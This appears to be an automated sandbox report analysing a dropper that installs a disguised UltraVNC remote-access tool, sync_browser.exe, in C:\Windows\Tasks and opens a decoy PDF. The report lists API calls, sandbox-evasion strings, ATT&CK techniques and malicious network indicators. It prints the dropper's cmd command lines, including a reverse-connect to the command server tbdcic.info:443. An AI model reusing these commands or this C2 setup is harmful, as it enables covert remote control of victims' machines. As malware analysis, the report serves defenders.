Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	21_2_00007FF7D595C210
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	26_2_00007FF7D5956DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5935910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	26_2_00007FF7D5935910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59EA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	26_2_00007FF7D59EA228
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	26_2_00007FF7D595C210

Source: C:\Windows\Tasks\sync_browser.exe

21_2_00007FF7D5956DD1

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5936060 GetProcAddress,GetVersion,GetProcAddress,GetSystemInfo,GetSystemInfo,

21_2_00007FF7D5936060

Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: sync_browser.exe, 00000015.00000002.3448690077.000000000091E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUS#
Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: sync_browser.exe, 0000001A.00000002.2369251582.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\Tasks\sync_browser.exe	API call chain: ExitProcess graph end node			graph_21-22234
Source: C:\Windows\Tasks\sync_browser.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Tasks\sync_browser.exe

Process information queried: ProcessInformation

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D59F47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

21_2_00007FF7D59F47E4

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D59426B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,

21_2_00007FF7D59426B0

Source: C:\Windows\Tasks\sync_browser.exe

21_2_00007FF7D5999BC0

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_0040236F

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59F47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00007FF7D59F47E4
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59E7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00007FF7D59E7220
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59F47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF7D59F47E4
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59E7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00007FF7D59E7220

Source: C:\Windows\Tasks\sync_browser.exe

Code function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe

26_2_00007FF7D5999BC0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D59436C0 GetModuleFileNameA,GetForegroundWindow,ShellExecuteExA,

21_2_00007FF7D59436C0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D59474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,

21_2_00007FF7D59474C0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5954D7E OpenInputDesktop,CloseDesktop,GetTickCount,GetSystemMetrics,GetSystemMetrics,mouse_event,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCursorPos,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,mouse_event,SystemParametersInfoA,SystemParametersInfoA,

21_2_00007FF7D5954D7E

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5947B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,

21_2_00007FF7D5947B90

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0040244E

Source: GIjul8.QTIrrr.0.dr	Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr	Binary or memory string: Program Manager
Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr	Binary or memory string: Shell_TrayWnd
Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr	Binary or memory string: Progman
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_00402187

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_00401815

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5999EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,

21_2_00007FF7D5999EF0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D59EDF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

21_2_00007FF7D59EDF80

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

0_2_00405721

Stealing of Sensitive Information

Yara detected UltraVNC Hacktool

Source: Yara match	File source: 26.0.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.2366282795.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Olz7TmvkEW.exe PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 8224, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, type: DROPPED
Source: Yara match	File source: C:\Windows\Tasks\GIjul8.QTIrrr, type: DROPPED
Source: Yara match	File source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED

Remote Access Functionality

Yara detected UltraVNC Hacktool

Source: Yara match	File source: 26.0.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.2366282795.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Olz7TmvkEW.exe PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 8224, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, type: DROPPED
Source: Yara match	File source: C:\Windows\Tasks\GIjul8.QTIrrr, type: DROPPED
Source: Yara match	File source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED

Contains VNC / remote desktop functionality (version string found)

Source: sync_browser.exe, 00000015.00000002.3449099877.0000000002590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008
Source: sync_browser.exe, 00000015.00000003.2481657113.000000000259A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	121 Input Capture	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	1 Valid Accounts	1 DLL Side-Loading	2 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	12 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Windows Service	1 Valid Accounts	1 Timestomp	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Access Token Manipulation	1 DLL Side-Loading	NTDS	4 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	1 Bootkit	11 Windows Service	231 Masquerading	LSA Secrets	26 System Information Discovery	SSH	Keylogging	2 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	22 Process Injection	1 Valid Accounts	Cached Domain Credentials	31 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	1 Virtualization/Sandbox Evasion	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Access Token Manipulation	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	22 Process Injection	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Bootkit	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Olz7TmvkEW.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R	0%	ReversingLabs
C:\Windows\Tasks\GIjul8.QTIrrr	0%	ReversingLabs
C:\Windows\Tasks\conhost.exe	0%	ReversingLabs
C:\Windows\Tasks\sdABZ4.E1924R	0%	ReversingLabs
C:\Windows\Tasks\sync_browser.exe	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
tbdcic.info	194.190.152.201	true	true	unknown
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
ax-0001.ax-msedge.net	150.171.27.10	true	false	high
x1.i.lencr.org	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.uvnc.com	Olz7TmvkEW.exe, 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	false	high
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D.13.dr	false	high
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	false	high
http://www.uvnc.comopenhttp://forum.uvnc.comnet	Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	false	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	false	high
